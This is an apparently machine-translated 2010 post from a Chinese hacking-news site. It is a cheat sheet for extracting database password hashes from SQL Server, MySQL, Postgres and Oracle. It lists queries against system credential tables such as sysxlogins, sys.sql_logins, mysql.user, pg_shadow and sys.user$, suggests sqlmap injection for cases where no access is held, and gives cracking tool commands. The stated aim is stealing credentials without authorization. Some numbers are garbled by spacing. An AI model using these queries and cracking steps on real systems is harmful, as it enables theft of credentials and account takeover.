Various database password hash access statement-vulnerability warning-the black bar safety net

ID MYHACK58:62201026003
Type myhack58
Reporter 佚名
Modified 2010-01-20T00:00:00


There is no access, can also grab?

Various database password hash get the statement, you can also directly use the sqlmap this injection tool!

SQL Server 2 0 0 0:- SELECT password from master. dbo. sysxlogins where name='sa' 0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341 2FD54D6119FFF04129A1D72E7C3194F7284A7F3A 0×0 1 0 0 - constant header 34767D5C - salt 0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case senstive hash 2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash crack the upper case hash in 'cain and abel' and then work the case sentive hash

SQL server 2 0 0 5:- SELECT password_hash FROM sys. sql_logins where name='sa' 0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F 0×0 1 0 0 - constant header 993BF231-salt 5F36CC441485B35C4D84687DC02C78B0E680411F - case sensitive hash crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo's comments:- use function fn_varbintohexstr() to cast password in a hex string. e.g. select name from sysxlogins union all select master. dbo. fn_varbintohexstr(password)from sysxlogins

MYSQL:- In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL's own user authentication system. It returns a 1 6-byte string for MySQL versions prior to 4.1, and a 4 1-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.

*mysql < 4.1 mysql> SELECT PASSWORD('mypass'); + -------+ | PASSWORD('mypass') | + -------+ | 6f8c114b58f2ce9e | + -------+

mysql >=4.1 mysql> SELECT PASSWORD('mypass'); +---------------+ | PASSWORD('mypass') | +---------------+ | 6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 | +---------------+ Select user, password from mysql. user The hashes can be cracked in 'cain and abel'

Postgres:- Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called "postgres" or "pgsql") select usename, passwd from pg_shadow; usename | passwd ------+------------- testuser | md5fabb6d7172aadfda4753bf0507ed4396 use mdcrack to crack these hashes:- $ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396

Oracle:- select name, password, spare4 from sys. user$ hashes could be cracked using 'cain and abel' or thc-orakelcrackert11g More on Oracle later, i am a bit bored....